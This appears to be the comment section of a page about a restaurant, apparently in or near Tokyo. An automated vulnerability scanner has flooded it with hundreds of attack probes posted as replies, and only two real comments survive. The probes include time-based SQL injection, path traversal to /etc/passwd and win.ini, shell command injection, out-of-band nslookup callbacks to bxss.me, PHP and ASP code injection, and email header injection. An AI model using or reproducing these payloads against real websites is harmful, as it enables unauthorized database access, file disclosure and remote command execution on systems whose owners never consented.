re: guest
Xj73saus')) OR 137=(SELECT 137 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@AvuN7
Hardly find any restaurant that dont increase price over the new year….
re: guest
o6wWov4H
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+553-553-1=0+0+0+1
re: guest
-1 OR 3+553-553-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
NDJPW56f'; waitfor delay '0:0:15' --
re: guest
-5 OR 201=(SELECT 201 FROM PG_SLEEP(15))--
re: guest
-5) OR 142=(SELECT 142 FROM PG_SLEEP(15))--
re: guest
-1)) OR 434=(SELECT 434 FROM PG_SLEEP(15))--
re: guest
pWl1Nwev' OR 915=(SELECT 915 FROM PG_SLEEP(15))--
re: guest
3X9Gmh3v') OR 368=(SELECT 368 FROM PG_SLEEP(15))--
re: guest
nRaQrNbA')) OR 426=(SELECT 426 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
woWDszGL
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+51-51-1=0+0+0+1
re: guest
-1 OR 3+51-51-1=0+0+0+1
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@M1Ur1
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
fOSVozeX'; waitfor delay '0:0:15' --
re: guest
-5 OR 560=(SELECT 560 FROM PG_SLEEP(15))--
re: guest
-5) OR 301=(SELECT 301 FROM PG_SLEEP(15))--
re: guest
-1)) OR 733=(SELECT 733 FROM PG_SLEEP(15))--
re: guest
et7J1Vrs' OR 488=(SELECT 488 FROM PG_SLEEP(15))--
re: guest
j9nbFc4d') OR 981=(SELECT 981 FROM PG_SLEEP(15))--
re: guest
MNEB6yaW')) OR 709=(SELECT 709 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@HV6c0
re: guest
1ZHPZx72O
re: guest
response.write(9620134*9387813)
re: guest
'+response.write(9620134*9387813)+'
re: guest
"+response.write(9620134*9387813)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
echo fmxxyb$()\ qjkxmh\nz^xyu||a #' &echo fmxxyb$()\ qjkxmh\nz^xyu||a #|" &echo fmxxyb$()\ qjkxmh\nz^xyu||a #
re: guest
file:///etc/passwd
re: guest
&echo bczgiy$()\ ljcvzh\nz^xyu||a #' &echo bczgiy$()\ ljcvzh\nz^xyu||a #|" &echo bczgiy$()\ ljcvzh\nz^xyu||a #
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
|echo cufmiu$()\ qzbcfe\nz^xyu||a #' |echo cufmiu$()\ qzbcfe\nz^xyu||a #|" |echo cufmiu$()\ qzbcfe\nz^xyu||a #
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
(nslookup hitzjrzuqspta7226a.bxss.me||perl -e "gethostbyname('hitzjrzuqspta7226a.bxss.me')")
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
$(nslookup hitjhvvxpnuzlbca73.bxss.me||perl -e "gethostbyname('hitjhvvxpnuzlbca73.bxss.me')")
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
&nslookup hitwcmywimikreb71b.bxss.me&'\"`0&nslookup hitwcmywimikreb71b.bxss.me&`'
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
&(nslookup hitiqczywinsq19b5d.bxss.me||perl -e "gethostbyname('hitiqczywinsq19b5d.bxss.me')")&'\"`0&(nslookup hitiqczywinsq19b5d.bxss.me||perl -e "gethostbyname('hitiqczywinsq19b5d.bxss.me')")&`'
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
|(nslookup hityfcevatyoa93608.bxss.me||perl -e "gethostbyname('hityfcevatyoa93608.bxss.me')")
re: guest
/etc/passwd
re: guest
`(nslookup hitgqvwxprtyy34e6f.bxss.me||perl -e "gethostbyname('hitgqvwxprtyy34e6f.bxss.me')")`
re: guest
%2fetc%2fpasswd
re: guest
;(nslookup hittvgdiehzty0ee8e.bxss.me||perl -e "gethostbyname('hittvgdiehzty0ee8e.bxss.me')")|(nslookup hittvgdiehzty0ee8e.bxss.me||perl -e "gethostbyname('hittvgdiehzty0ee8e.bxss.me')")&(nslookup hittvgdiehzty0ee8e.bxss.me||perl -e "gethostbyname('hittvgdiehzty0ee8e.bxss.me')")
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
%0abcc:074625.67-14490.67.112b9.19990.2@bxss.me
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
to@example.com>%0d%0abcc:074625.67-14491.67.112b9.19990.2@bxss.me
re: guest
file:///etc/passwd
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
/WEB-INF/web.xml
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
${9999018+9999751}
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
)
re: guest
WEB-INF\web.xml
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
'.gethostbyname(lc('hitsh'.'irppqykj1f2fd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(79).chr(112).chr(89).'
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
".gethostbyname(lc("hitsu"."yqsdukbjc41ed.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(78).chr(111).chr(87)."
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
Http://bxss.me/t/fit.txt
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
/etc/shells
re: guest
c:/windows/win.ini
re: guest
bxss.me
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(105).concat(66).concat(114).concat(66)+(require"socket"
Socket.gethostbyname("hitcv"+"sumpwucwdf9f0.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(113).concat(79).concat(100).concat(86)+(require'socket'
Socket.gethostbyname('hitfm'+'jrdfctco649f4.bxss.me.')[3].to_s)+'
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
';print(md5(31337));$a='
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
";print(md5(31337));$a="
re: guest
${@print(md5(31337))}
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
'"
re: guest
<!--
re: guest
1
re: guest
1
re: guest
-1 OR 2+414-414-1=0+0+0+1 --
re: guest
-1 OR 3+414-414-1=0+0+0+1 --
re: guest
-1 OR 2+54-54-1=0+0+0+1
re: guest
-1 OR 3+54-54-1=0+0+0+1
re: guest
-1' OR 2+726-726-1=0+0+0+1 --
re: guest
-1' OR 3+726-726-1=0+0+0+1 --
re: guest
-1' OR 2+948-948-1=0+0+0+1 or 'F10dj3j5'='
re: guest
-1' OR 3+948-948-1=0+0+0+1 or 'F10dj3j5'='
re: guest
-1" OR 2+407-407-1=0+0+0+1 --
re: guest
-1" OR 3+407-407-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
rBj3cB2y'; waitfor delay '0:0:15' --
re: guest
-5 OR 927=(SELECT 927 FROM PG_SLEEP(15))--
re: guest
-5) OR 812=(SELECT 812 FROM PG_SLEEP(15))--
re: guest
-1)) OR 804=(SELECT 804 FROM PG_SLEEP(15))--
re: guest
ZSt160OE' OR 825=(SELECT 825 FROM PG_SLEEP(15))--
re: guest
RTJVqm2t') OR 592=(SELECT 592 FROM PG_SLEEP(15))--
re: guest
vdsieUzm')) OR 936=(SELECT 936 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@n9OUC
I went back for my 3rd visit and its the first time I went in March. Previous times I went in October. So neta was a little different. Wasn't as mind blowingly good this time, previous visit I thought basically every morsel was magnificent. This time, about 80% were superb. Still my favourite place to visit and highly recommend to anyone visiting tokyo. The train ride isnt that bad and its a 10-15min walk from the station.
re: Wanderlusting
HNHJpnCy
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
uola72e7
re: Wanderlusting
-1 OR 2+662-662-1=0+0+0+1
re: Wanderlusting
1*
re: Wanderlusting
-1 OR 3+662-662-1=0+0+0+1
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
1*
re: Wanderlusting
-1 OR 2+651-651-1=0+0+0+1
re: Wanderlusting
-1 OR 3+651-651-1=0+0+0+1
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
6lsVoX2V'; waitfor delay '0:0:15' --
re: Wanderlusting
04d6FJxv'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 237=(SELECT 237 FROM PG_SLEEP(15))--
re: Wanderlusting
-5 OR 969=(SELECT 969 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 203=(SELECT 203 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 500=(SELECT 500 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 329=(SELECT 329 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 163=(SELECT 163 FROM PG_SLEEP(15))--
re: Wanderlusting
u1rHn9VZ' OR 88=(SELECT 88 FROM PG_SLEEP(15))--
re: Wanderlusting
rEo1IUue' OR 109=(SELECT 109 FROM PG_SLEEP(15))--
re: Wanderlusting
ifmfQQUr') OR 249=(SELECT 249 FROM PG_SLEEP(15))--
re: Wanderlusting
M2V3YhER') OR 14=(SELECT 14 FROM PG_SLEEP(15))--
re: Wanderlusting
9UfxEmdD')) OR 663=(SELECT 663 FROM PG_SLEEP(15))--
re: Wanderlusting
cptKJgxf')) OR 925=(SELECT 925 FROM PG_SLEEP(15))--
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@rbST1
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@7KRdL
re: Wanderlusting
1bCHmlCNO
re: Wanderlusting
response.write(9036127*9871924)
re: Wanderlusting
'+response.write(9036127*9871924)+'
re: Wanderlusting
"+response.write(9036127*9871924)+"
re: Wanderlusting
../../../../../../../../../../../../../../etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../windows/win.ini
re: Wanderlusting
echo befecs$()\ vyfzxe\nz^xyu||a #' &echo befecs$()\ vyfzxe\nz^xyu||a #|" &echo befecs$()\ vyfzxe\nz^xyu||a #
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
&echo uayswv$()\ njwhln\nz^xyu||a #' &echo uayswv$()\ njwhln\nz^xyu||a #|" &echo uayswv$()\ njwhln\nz^xyu||a #
re: Wanderlusting
../../../../../../../../../../../../../../../proc/version
re: Wanderlusting
|echo yuzytc$()\ epiwgn\nz^xyu||a #' |echo yuzytc$()\ epiwgn\nz^xyu||a #|" |echo yuzytc$()\ epiwgn\nz^xyu||a #
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Wanderlusting
(nslookup hitttghbtgywub6e0f.bxss.me||perl -e "gethostbyname('hitttghbtgywub6e0f.bxss.me')")
re: Wanderlusting
../../../../../../../../../../etc/passwd%00.jpg
re: Wanderlusting
$(nslookup hitbtbbwlafpwe9e75.bxss.me||perl -e "gethostbyname('hitbtbbwlafpwe9e75.bxss.me')")
re: Wanderlusting
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Wanderlusting
&nslookup hitnjcjbscfjw3877f.bxss.me&'\"`0&nslookup hitnjcjbscfjw3877f.bxss.me&`'
re: Wanderlusting
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Wanderlusting
&(nslookup hitdynlniylwv4d68c.bxss.me||perl -e "gethostbyname('hitdynlniylwv4d68c.bxss.me')")&'\"`0&(nslookup hitdynlniylwv4d68c.bxss.me||perl -e "gethostbyname('hitdynlniylwv4d68c.bxss.me')")&`'
re: Wanderlusting
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Wanderlusting
|(nslookup hitpnvuzryins67a6c.bxss.me||perl -e "gethostbyname('hitpnvuzryins67a6c.bxss.me')")
re: Wanderlusting
/etc/passwd
re: Wanderlusting
`(nslookup hityuzrxzirut37ff6.bxss.me||perl -e "gethostbyname('hityuzrxzirut37ff6.bxss.me')")`
re: Wanderlusting
%2fetc%2fpasswd
re: Wanderlusting
;(nslookup hitnwsyvkzutmcc0f0.bxss.me||perl -e "gethostbyname('hitnwsyvkzutmcc0f0.bxss.me')")|(nslookup hitnwsyvkzutmcc0f0.bxss.me||perl -e "gethostbyname('hitnwsyvkzutmcc0f0.bxss.me')")&(nslookup hitnwsyvkzutmcc0f0.bxss.me||perl -e "gethostbyname('hitnwsyvkzutmcc0f0.bxss.me')")
re: Wanderlusting
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Wanderlusting
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Wanderlusting
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Wanderlusting
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Wanderlusting
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Wanderlusting
%0abcc:074625.67-14505.67.5ceaa.19990.2@bxss.me
re: Wanderlusting
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.